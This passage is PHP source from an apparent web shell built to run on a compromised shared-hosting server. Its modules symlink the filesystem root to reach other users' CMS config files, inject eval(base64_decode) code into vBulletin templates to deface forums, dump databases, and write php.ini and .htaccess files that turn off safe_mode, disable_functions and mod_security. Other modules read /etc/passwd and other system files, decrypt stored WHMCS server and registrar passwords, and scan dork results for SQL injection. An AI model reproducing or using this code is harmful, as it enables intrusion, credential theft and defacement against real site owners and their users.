- $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
- $posRight = @stripos($mytext,$endtag,$posLeft+1);
- return @substr($mytext,$posLeft,$posRight-$posLeft);
- flush();
- }
- echo '<br><br><center>';
- echo '
- <br />
- <div class="sc"><form method="post">
- Site to scan : <input type="text" name="site" size="30" style="color:#FF0000;background-color:#000000" value="site.com" />   <input type="submit" style="color:#FF0000;background-color:#000000" name="scan" value="Scan !" />
- </form></div>';
- if(isset($_POST['scan']))
- {
- $site = @htmlentities($_POST['site']);
- if (empty($site)){die('<br /><br /> Not add IP .. !');}
- $ip_port = @gethostbyname($site);
- echo "
- <br /><div class=\"sc2\">Scanning [ $site ip $ip_port ] ... </div>
- <div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>
- <div class=\"ru\"> <br /><br /><pre>
- ";
- echo "".sws_port_scan($ip_port)." </pre></div> ";
- flush();
- echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
- <div class=\"ru\">
- <pre>".sws_domain_info($site)."</pre></div>";
- flush();
- echo "
- <div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>
- <div class=\"ru\">
- <pre>".sws_net_info($site)."</pre> </div>";
- flush();
- echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
- <div class=\"ru\">
- <pre>".sws_sup_dom($site)."</pre> </div>";
- flush();
- echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>
- <div class=\"ru\">
- <pre>".sws_site_ser($site)."</pre> </div>
- <div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>";
- flush();
- }
- echo '</center>';
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'identify'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=identify" method="post">
- <?php
- echo "<center><br><br>
- <font style=\"color:#FF0000\">This function is used to identify some CMS on all website in this server</font><br>
- <font style=\"color:#FF0000\">may take very long time and this shell gonna lag, if you want to continue, press \"Check Now\" button</font><br><br>
- <form type=post>
- <input type='submit' style=\"color:#FF0000\" value='Check Now' name='checkingstart'>
- </form></center>";
- if (isset($_POST['checkingstart'])) {
- echo "<center>";
- $WebUrl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
- $Explode=explode('/',$WebUrl );
- $WebUrl =str_replace($Explode[count($Explode)-1],'',$WebUrl );
- @mkdir('sym',0777);
- $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- $write =@fopen ('sym/.htaccess','w');
- fwrite($write ,$htaccess);
- @symlink('/','sym/root');
- $filelocation = basename(__FILE__);
- $read_named_conf = @file('/etc/named.conf');
- if(!$read_named_conf)
- {
- die (" can't read /etc/named.conf,Please use <a href='?vvip=sytc'>/etc Symlink</a>");
- }
- $new12 = explode (', ', $dis_func);
- if (in_array('posix_getpwuid', $new12)){die('<center><b># posix_getpwuid is Not Supported</b></center>');}
- else
- {
- echo "<div class='tmp'>
- <table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td> Domains </td><td> Script </td>";
- foreach($read_named_conf as $subject){
- if(eregi('zone',$subject)){
- preg_match_all('#zone "(.*)"#',$subject,$string);
- flush();
- if(strlen(trim($string[1][0])) >2){
- $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
- $Wordpress=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/wp-config.php';
- $wp=get_headers($Wordpress);
- $haystackwp=$wp[0];
- $Wordpress2=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/blog/wp-config.php';
- $wp2=get_headers($Wordpress2);
- $haystackwp2=$wp2[0];
- $Joomla=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/configuration.php';
- $jmla=get_headers($Joomla);
- $haystackjmla=$jmla[0];
- $Joomla2=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/joomla/configuration.php';
- $jmla2=get_headers($Joomla2);
- $haystackjmla2=$jmla2[0];
- $Vbulletin=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/includes/config.php';
- $vb=get_headers($Vbulletin);
- $haystackvb=$vb[0];
- $Vbulletin3=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/vb/includes/config.php';
- $vb3=get_headers($Vbulletin3);
- $haystackvb2=$vb3[0];
- $Vbulletin5=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/forum/includes/config.php';
- $vb5=get_headers($Vbulletin5);
- $haystackvb5=$vb5[0];
- $whmcs1=$WebUrl.'/sym/root/home/'.$UID['name'].'public_html/clients/configuration.php';
- $whm=get_headers($whmcs1);
- $haystackwhm=$whm[0];
- $whmcs1=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/support/configuration.php';
- $whm=get_headers($whmcs1);
- $haystackwhm=$whm[0];
- $whmcs2=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/client/configuration.php';
- $whm2=get_headers($whmcs2);
- $haystackwhm2=$whm2[0];
- $whmcs3=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/submitticket.php';
- $whm3=get_headers($whmcs3);
- $haystackwhm3=$whm3[0];
- $whmcs4=$WebUrl.'/sym/root/home/'.$UID['name'].'/public_html/client/configuration.php';
- $whm4=get_headers($whmcs4);
- $haystackwhm=$whm4[0];
- $Websitez = strpos($haystackwp,'200');
- $Websitez=' ';
- if (strpos($haystackwp,'200') == true )
- {
- $Websitez="<a href='".$Wordpress."' target='_blank'>Wordpress</a>";
- }
- elseif (strpos($haystackwp2,'200') == true)
- {
- $Websitez="<a href='".$Wordpress2."' target='_blank'>Wordpress</a>";
- }
- elseif (strpos($haystackjmla,'200') == true and strpos($haystackwhm3,'200') == true )
- {
- $Websitez=" <a href='".$whmcs3."' target='_blank'>WHMCS</a>";
- }
- elseif (strpos($haystackwhm,'200') == true)
- {
- $Websitez =" <a href='".$whmcs1."' target='_blank'>WHMCS</a>";
- }
- elseif (strpos($haystackwhm2,'200') == true)
- {
- $Websitez =" <a href='".$whmcs2."' target='_blank'>WHMCS</a>";
- }
- elseif (strpos($haystackjmla,'200') == true)
- {
- $Websitez=" <a href='".$Joomla."' target='_blank'>Joomla</a>";
- }
- elseif (strpos($haystackjmla2,'200') == true)
- {
- $Websitez=" <a href='".$Joomla2."' target='_blank'>Joomla</a>";
- }
- elseif (strpos($haystackvb,'200') == true)
- {
- $Websitez=" <a href='".$Vbulletin."' target='_blank'>vBulletin</a>";
- }
- elseif (strpos($haystackvb2,'200') == true)
- {
- $Websitez=" <a href='".$Vbulletin3."' target='_blank'>vBulletin</a>";
- }
- elseif (strpos($Vbulletin4,'200') == true)
- {
- $Websitez=" <a href='".$Vbulletin5."' target='_blank'>vBulletin</a>";
- }
- else
- {
- continue;
- }
- $name = $UID['name'] ;
- echo '<tr><td><a href=http://www.'.$string[1][0].'/>'.$string[1][0].'</a></td>
- <td>'.$Websitez.'</td></tr></center>';
- flush();
- }
- }
- }
- }
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'vb'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=vb" method="post">
- <br><br><br><div align="center">
- <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">
- <font color="#00FF00"> vB Index Changer</font><font color="#FF0000">
- <font face="Tahoma">! Change All Pages For Forum !
- <br></font></div><br>
- <?
- if(empty($_POST['index'])){
- echo "<center><FORM method=\"POST\">
- host : <INPUT size=\"15\" value=\"localhost\" style='color:#FF0000;background-color:#000000' name=\"localhost\" type=\"text\">
- database : <INPUT size=\"15\" style='color:#FF0000;background-color:#000000' value=\"forum_vb\" name=\"database\" type=\"text\"><br>
- username : <INPUT size=\"15\" style='color:#FF0000;background-color:#000000' value=\"forum_vb\" name=\"username\" type=\"text\">
- password : <INPUT size=\"15\" style='color:#FF0000;background-color:#000000' value=\"vb\" name=\"password\" type=\"text\"><br>
- <br>
- <textarea name=\"index\" cols=\"70\" rows=\"30\">Set Your Index</textarea><br>
- <INPUT value=\"Set\" style='color:#FF0000;background-color:#000000' name=\"send\" type=\"submit\">
- </FORM></center>";
- }else{
- $localhost = $_POST['localhost'];
- $database = $_POST['database'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $index = $_POST['index'];
- @mysql_connect($localhost,$username,$password) or die(mysql_error());
- @mysql_select_db($database) or die(mysql_error());
- $index=str_replace("\'","'",$index);
- $set_index = "{\${eval(base64_decode(\'";
- $set_index .= base64_encode("echo \"$index\";");
- $set_index .= "\'))}}{\${exit()}}</textarea>";
- echo("UPDATE template SET template ='".$set_index."' ") ;
- $ok=@mysql_query("UPDATE template SET template ='".$set_index."'") or die(mysql_error());
- if($ok){
- echo "!! update finish !!<br><br>";
- }
- }
- # Footer
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=symlink" method="post">
- <?php
- @set_time_limit(0);
- echo "<center>";
- @mkdir('sym',0777);
- $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- $write =@fopen ('sym/.htaccess','w');
- fwrite($write ,$htaccess);
- @symlink('/','sym/root');
- $filelocation = basename(__FILE__);
- $read_named_conf = @file('/etc/named.conf');
- if(!$read_named_conf)
- {
- echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
- }
- else
- {
- echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
- foreach($read_named_conf as $subject){
- if(eregi('zone',$subject)){
- preg_match_all('#zone "(.*)"#',$subject,$string);
- flush();
- if(strlen(trim($string[1][0])) >2){
- $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
- $name = $UID['name'] ;
- @symlink('/','sym/root');
- $name = $string[1][0];
- $iran = '\.ir';
- $israel = '\.il';
- $indo = '\.id';
- $sg12 = '\.sg';
- $edu = '\.edu';
- $gov = '\.gov';
- $gose = '\.go';
- $gober = '\.gob';
- $mil1 = '\.mil';
- $mil2 = '\.mi';
- if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
- or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
- {
- $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
- }
- echo "
- <tr>
- <td>
- <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
- </td>
- <td>
- '.$UID['name']."
- </td>
- <td>
- <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
- </td>
- </tr></div> ";
- flush();
- }
- }
- }
- }
- echo "</center></table>";
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'mysqlbackup'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=mysqlbackup" method="post">
- <?php
- echo '<center><br><br><br>
- <table border=1 width=400 style="border-collapse: collapse" cellpadding=2>
- <tr>
- <td width=400 colspan=2 style=\'color:#FF0000;background-color:#000000\'><p align=center>
- <b><font face=Arial size=2 style=\'color:#FF0000;background-color:#000000\'>Backup Database</font></b>
- </td></tr>
- <tr>
- <td width=150 style=\'color:#FF0000;background-color:#000000\'>
- <font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>DB Type:</font></td>
- <td width=250 style=\'color:#FF0000;background-color:#000000\'>
- <form method=post action="'.$me.'">
- <select style=\'color:#FF0000;background-color:#000000\' name=method>
- <option value="gzip">Gzip</option>
- <option value="sql">Sql</option>
- </select></td></tr>
- <tr>
- <td width=150 style=\'color:#FF0000;background-color:#000000\'>
- <font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>Server:</font>
- </td>
- <td width=250 style=\'color:#FF0000;background-color:#000000\'>
- <input type=text name=server style=\'color:#FF0000;background-color:#000000\' value=localhost size=35>
- </td></tr>
- <tr>
- <td width=150 style=\'color:#FF0000;background-color:#000000\'><font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>Username:</font></td>
- <td width=250 style=\'color:#FF0000;background-color:#000000\'><input style=\'color:#FF0000;background-color:#000000\' type=text name=username size=35></td>
- </tr>
- <tr>
- <td width=150 style=\'color:#FF0000;background-color:#000000\'><font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>Password:</font></td>
- <td width=250 style=\'color:#FF0000;background-color:#000000\'><input style=\'color:#FF0000;background-color:#000000\' type=text name=password></td>
- </tr>
- <tr>
- <td width=150 style=\'color:#FF0000;background-color:#000000\'><font face=Arial style=\'color:#FF0000;background-color:#000000\' size=2>Data Base Name:</font></td>
- <td width=250 style=\'color:#FF0000;background-color:#000000\'><input style=\'color:#FF0000;background-color:#000000\' type=text name=dbname></td>
- </tr>
- <tr>
- <td width=400 colspan=2 style=\'color:#FF0000;background-color:#000000\'><center><input style=\'color:#FF0000;background-color:#000000\' type=submit value=" Dump! " ></td>
- </tr>
- </table></form></center></table>';
- if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
- $date = date("Y-m-d");
- $dbserver = $_POST['server'];
- $dbuser = $_POST['username'];
- $dbpass = $_POST['password'];
- $dbname = $_POST['dbname'];
- $file = "Dump-$dbname-$date";
- $method = $_POST['method'];
- if ($method=='sql'){
- $file="Dump-$dbname-$date.sql";
- $fp=fopen($file,"w");
- }else{
- $file="Dump-$dbname-$date.sql.gz";
- $fp = gzopen($file,"w");
- }
- function write($data) {
- global $fp;
- if ($_POST['method']=='sql'){
- fwrite($fp,$data);
- }else{
- gzwrite($fp, $data);
- }}
- function filesize_n($path)
- {
- $size = @filesize($path);
- if( $size < 0 ){
- ob_start();
- system('ls -al "'.$path.'" | awk \'BEGIN {FS=" "}{print $5}\'');
- $size = ob_get_clean();
- }
- return $size;
- }
- function format_size($size) {
- $sizes = array(" Bytes", " KB", " MB", " GB", " TB", " PB", " EB", " ZB", " YB");
- if ($size == 0) { return('n/a'); } else {
- return (round($size/pow(1024, ($i = floor(log($size, 1024)))), $i > 1 ? 2 : 0) . $sizes[$i]); }
- }
- mysql_connect ($dbserver, $dbuser, $dbpass);
- mysql_select_db($dbname);
- $tables = mysql_query ("SHOW TABLES");
- while ($i = mysql_fetch_array($tables)) {
- $i = $i['Tables_in_'.$dbname];
- $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
- write($create['Create Table'].";\n\n");
- $sql = mysql_query ("SELECT * FROM ".$i);
- if (mysql_num_rows($sql)) {
- while ($row = mysql_fetch_row($sql)) {
- foreach ($row as $j => $k) {
- $row[$j] = "'".mysql_escape_string($k)."'";
- }
- write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
- }
- }
- }
- if ($method=='sql'){
- fclose ($fp);
- }else{
- gzclose($fp);}
- $sizedatabasefile = filesize_n($file);
- $sizehumanreadable = format_size($sizedatabasefile);
- echo "<br><br>
- <center><font color='#FF0000'>Download Database -> </font>
- <a href='$file'>Here</a>
- <font color='#FF0000'> | DatabaseFileSize -> $sizehumanreadable </font></center>";
- flush();
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'security-mode'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=security-mode" method="post">
- <?php
- echo "<html>
- <center><br><br><br>
- <font color=#FF0000 > Disable SafeMode and Clear Disable Function using php.ini </font><br>
- <form method='POST' >
- <font color=#FF0000 > Path to Disable : </font><input type='text' name='phpinisafemode' value='$pwd' style='color:#FF0000;background-color:#000000' /><br>
- <input type='submit' name='dsmsubmit' style='color:#FF0000;background-color:#000000' value='Create PHP.INI' />
- </form>
- <br><br>
- <font color=#FF0000 > Disable SafeMode and Clear Disable Function using Htaccess </font><br>
- <form method='POST' >
- <font color=#FF0000 > Path to Disable : </font><input type='text' name='htaccesssafemode' style='color:#FF0000;background-color:#000000' value='$pwd' /><br>
- <input type='submit' name='omssubmit' style='color:#FF0000;background-color:#000000' value='Create .HTACCESS' />
- </form>";
- $dirphpini = $_POST['phpinisafemode'];
- $dirhtaccess = $_POST['htaccesssafemode'];
- $phpininamelol = "php.ini";
- if($_POST['omssubmit'])
- {
- $fse=fopen("$dirphpini.htaccess","w");
- fwrite($fse,'<IfModule mod_security.c>
- Sec------Engine Off
- Sec------ScanPOST Off
- </IfModule>');
- fclose($fse);
- }
- else if ($_POST['dsmsubmit'])
- {
- $fse=fopen("$dirhtaccess$phpininamelol","w");
- fwrite($fse,'safe_mode=OFF
- disable_functions=NONE');
- fclose($fse);
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'process'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=process" method="post">
- <?php
- function processc99() {
- if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
- else {$handler = "tasklist";}
- $ret = myshellexec($handler);
- if (!$ret) {echo "Can't execute \"".$handler."\"!";}
- else
- {
- if (empty($processes_sort)) {$processes_sort = $sort_default;}
- $parsesort = parsesort($processes_sort);
- if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
- $k = $parsesort[0];
- $ret = htmlspecialchars($ret);
- if (!$win)
- {
- if ($pid)
- {
- if (is_null($sig)) {$sig = 9;}
- echo "Sending signal ".$sig." to #".$pid."... ";
- if (posix_kill($pid,$sig)) {echo "OK.";}
- else {echo "ERROR.";}
- }
- while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
- $stack = explode("\n",$ret);
- $head = explode(" ",$stack[0]);
- unset($stack[0]);
- $prcs = array();
- foreach ($stack as $line)
- {
- if (!empty($line))
- {
- echo "<tr>";
- $line = explode(" ",$line);
- $line[10] = join(" ",array_slice($line,10));
- $line = array_slice($line,0,11);
- $prcs[] = $line;
- echo "</tr>";
- }
- }
- }
- else
- {
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
- while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
- $ret = convert_cyr_string($ret,"d","w");
- $stack = explode("\n",$ret);
- unset($stack[0],$stack[2]);
- $stack = array_values($stack);
- $head = explode("",$stack[0]);
- $head[1] = explode(" ",$head[1]);
- $head[1] = $head[1][0];
- $stack = array_slice($stack,1);
- unset($head[2]);
- $head = array_values($head);
- if ($k > count($head)) {$k = count($head)-1;}
- $prcs = array();
- foreach ($stack as $line)
- {
- if (!empty($line))
- {
- echo "<tr>";
- $line = explode("",$line);
- $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
- $line[2] = intval(str_replace(" ","",$line[2]))*1024;
- $prcs[] = $line;
- echo "</tr>";
- }
- }
- }
- $head[$k] = "<b>".$head[$k]."</b>".$y;
- $v = $processes_sort[0];
- if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
- $tab = array();
- $tab[] = $head;
- $tab = array_merge($tab,$prcs);
- echo "<TABLE height=1 cellSpacing=0 cellPadding=5 width=\"100%\" border=1>";
- foreach($tab as $i=>$k)
- {
- echo "<tr>";
- foreach($k as $j=>$v) {
- if ($win and $i > 0 and $j == 2) {
- $v = view_size($v);
- }
- echo "<td>".$v."</td>";}
- echo "</tr>";
- }
- echo "</table>";
- }
- }
- echo "<center><br><br>";
- if($win) {
- echo "<form method='post'>
- <select style='color:#FF0000;background-color:#000000' name='windowsprocess'>
- <option name='systeminfo'>System Info</option>
- <option name='active'>Active Connections</option>
- <option name='runningserv'>Running Services</option>
- <option name='useracc'>User Accounts</option>
- <option name='showcom'>Show Computers</option>
- <option name='arptab'>ARP Table</option>
- <option name='ipconf'>IP Configuration</option>
- </select>
- <input type='submit' style='color:#FF0000;background-color:#000000' name='submitwinprocess' value='View'>
- </form>
- ";
- } else {
- echo "<form method='post'>
- <select style='color:#FF0000;background-color:#000000' name='nonwindowsprocess'>
- <option name='processsta'>Process status</option>
- <option name='syslog'>Syslog</option>
- <option name='resolv'>Resolv</option>
- <option name='hosts'>Hosts</option>
- <option name='passwd'>Passwd</option>
- <option name='cpuinfo'>Cpuinfo</option>
- <option name='version'>Version</option>
- <option name='sbin'>Sbin</option>
- <option name='interrupts'>Interrupts</option>
- <option name='lsattr'>lsattr</option>
- <option name='uptime'>Uptime</option>
- <option name='fstab'>Fstab</option>
- <option name='hddspace'>HDD Space</option>
- </select>
- <input type='submit' style='color:#FF0000;background-color:#000000' name='submitnonwinprocess' value='View'>
- </form>
- ";
- }
- $windowsprocess = $_POST['windowsprocess'];
- $nonwindowsprocess = $_POST['nonwindowsprocess'];
- if ($windowsprocess=="System Info") $winruncom = "systeminfo";
- if ($windowsprocess=="Active Connections") $winruncom = "netstat -an";
- if ($windowsprocess=="Running Services") $winruncom = "net start";
- if ($windowsprocess=="User Accounts") $winruncom = "net user";
- if ($windowsprocess=="Show Computers") $winruncom = "net view";
- if ($windowsprocess=="ARP Table") $winruncom = "arp -a";
- if ($windowsprocess=="IP Configuration") $winruncom = "ipconfig /all";
- if ($nonwindowsprocess=="Process status") $systeminfo = "ps aux";
- if ($nonwindowsprocess=="Syslog") $winruncom = "cat /etc/syslog.conf";
- if ($nonwindowsprocess=="Resolv") $winruncom = "cat /etc/resolv.conf";
- if ($nonwindowsprocess=="Hosts") $winruncom = "cat /etc/hosts";
- if ($nonwindowsprocess=="Passwd") $winruncom = "cat /etc/passwd";
- if ($nonwindowsprocess=="Cpuinfo") $winruncom = "cat /proc/cpuinfo";
- if ($nonwindowsprocess=="Version") $winruncom = "cat /proc/version";
- if ($nonwindowsprocess=="Sbin") $winruncom = "ls -al /usr/sbin";
- if ($nonwindowsprocess=="Interrupts") $winruncom = "cat /proc/interrupts";
- if ($nonwindowsprocess=="lsattr") $winruncom = "lsattr -va";
- if ($nonwindowsprocess=="Uptime") $winruncom = "uptime";
- if ($nonwindowsprocess=="Fstab") $winruncom = "cat /etc/fstab";
- if ($nonwindowsprocess=="HDD Space") $winruncom = "df -h";
- if (isset($winruncom)) {
- echo "<table class='cmdbox'>
- <tbody><tr>
- <td colspan='2'>
- <textarea class='output' name='content'>".exe($winruncom)."</textarea>
- </td></tr></table></center>";
- }
- if (isset($systeminfo)) {
- echo "<br><br>";
- processc99();
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=whmcs" method="post">
- <?php
- function decrypt ($string,$cc_encryption_hash)
- {
- $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
- $hash_key = _hash ($key);
- $hash_length = strlen ($hash_key);
- $string = base64_decode ($string);
- $tmp_iv = substr ($string, 0, $hash_length);
- $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
- $iv = $out = '';
- $c = 0;
- while ($c < $hash_length)
- {
- $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
- ++$c;
- }
- $key = $iv;
- $c = 0;
- while ($c < strlen ($string))
- {
- if (($c != 0 AND $c % $hash_length == 0))
- {
- $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
- }
- $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
- ++$c;
- }
- return $out;
- }
- function _hash ($string)
- {
- if (function_exists ('sha1'))
- {
- $hash = sha1 ($string);
- }
- else
- {
- $hash = md5 ($string);
- }
- $out = '';
- $c = 0;
- while ($c < strlen ($hash))
- {
- $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
- $c += 2;
- }
- return $out;
- }
- echo "<hr>
- <br>
- <center>
- <br>
- <FORM action='' method='post'>
- <input type='hidden' name='form_action' value='2'>
- <br>
- <table border=1>
- <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:#000000' size='30' name='db_host' value='localhost'></td></tr>
- <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:#000000' size='30' name='db_username' value=''></td></tr>
- <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:#000000' size='30' name='db_password' value=''></td></tr>
- <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:#000000' size='30' name='db_name' value=''></td></tr>
- <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:#000000' type='text' size='30' name='cc_encryption_hash' value=''></td></tr>
- </table>
- <br>
- <INPUT class=submit type='submit' style='color:#FF0000;background-color:#000000' value='Submit' name='Submit'>
- </FORM>
- </center>
- <hr>";
- if($_POST['form_action'] == 2 )
- {
- //include($file);
- $db_host=($_POST['db_host']);
- $db_username=($_POST['db_username']);
- $db_password=($_POST['db_password']);
- $db_name=($_POST['db_name']);
- $cc_encryption_hash=($_POST['cc_encryption_hash']);
- $link=mysql_connect($db_host,$db_username,$db_password) ;
- mysql_select_db($db_name,$link) ;
- $query = mysql_query("SELECT * FROM tblservers");
- while($v = mysql_fetch_array($query)) {
- $ipaddress = $v['ipaddress'];
- $username = $v['username'];
- $type = $v['type'];
- $active = $v['active'];
- $hostname = $v['hostname'];
- echo("<center><table border='1'>");
- $password = decrypt ($v['password'], $cc_encryption_hash);
- echo("<tr><td>Type</td><td>$type</td></tr>");
- echo("<tr><td>Active</td><td>$active</td></tr>");
- echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
- echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
- echo("<tr><td>Username</td><td>$username</td></tr>");
- echo("<tr><td>Password</td><td>$password</td></tr>");
- echo "</table><br><br></center>";
- }
- $link=mysql_connect($db_host,$db_username,$db_password) ;
- mysql_select_db($db_name,$link) ;
- $query = mysql_query("SELECT * FROM tblregistrars");
- echo("<center>Domain Reseller <br><table border='1'>");
- echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
- while($v = mysql_fetch_array($query)) {
- $registrar = $v['registrar'];
- $setting = $v['setting'];
- $value = decrypt ($v['value'], $cc_encryption_hash);
- if ($value=="") {
- $value=0;
- }
- $password = decrypt ($v['password'], $cc_encryption_hash);
- echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
- }
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'sqli-scanner'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=sqli-scanner" method="post">
- <?php
- echo '<br><br><center><form method="post" action=""><font color="red">Dork :</font> <input type="text" value="" name="dork" style="color:#FF0000;background-color:#000000" size="20"/><input type="submit" style="color:#FF0000;background-color:#000000" name="scan" value="Scan"></form></center>';
- ob_start();
- set_time_limit(0);
- if (isset($_POST['scan'])) {
- $browser = $_SERVER['HTTP_USER_AGENT'];
- $first = "startgoogle.startpagina.nl/index.php?q=";
- $sec = "&start=";
- $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
- for($id=0 ; $id<=30; $id++){
- $page=$id*10;
- $dork=urlencode($_POST['dork']);
- $url = $first.$dork.$sec.$page;
- $curl = curl_init($url);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
- $result = curl_exec($curl);
- curl_close($curl);
- preg_match_all($reg,$result,$matches);
- }
- foreach($matches[1] as $site){
- $url = preg_replace("/=/", "='", $site);
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$url);
- curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
- curl_setopt($curl,CURLOPT_TIMEOUT,'5');
- $GET=curl_exec($curl);
- if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row()|SELECT *
- FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
- echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'" target="_blank">'.$url.'</a><font style="color:#FF0000"> <-- SQLI Vuln
- Found..</font></b></center>';
- ob_flush();flush();
- }else{
- echo '<center><font style="color:#FFFFFF"><b>'.$url.'</b></font><font style="color:#0FFF16"> <-- Not Vuln</font></center>';
- ob_flush();flush();
- }
- ob_flush();flush();
- }
- ob_flush();flush();
- }
- ob_flush();flush();
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){ ?>
- <form action="?y=<?php echo $pwd; ?>&x=zone-h" method="post">
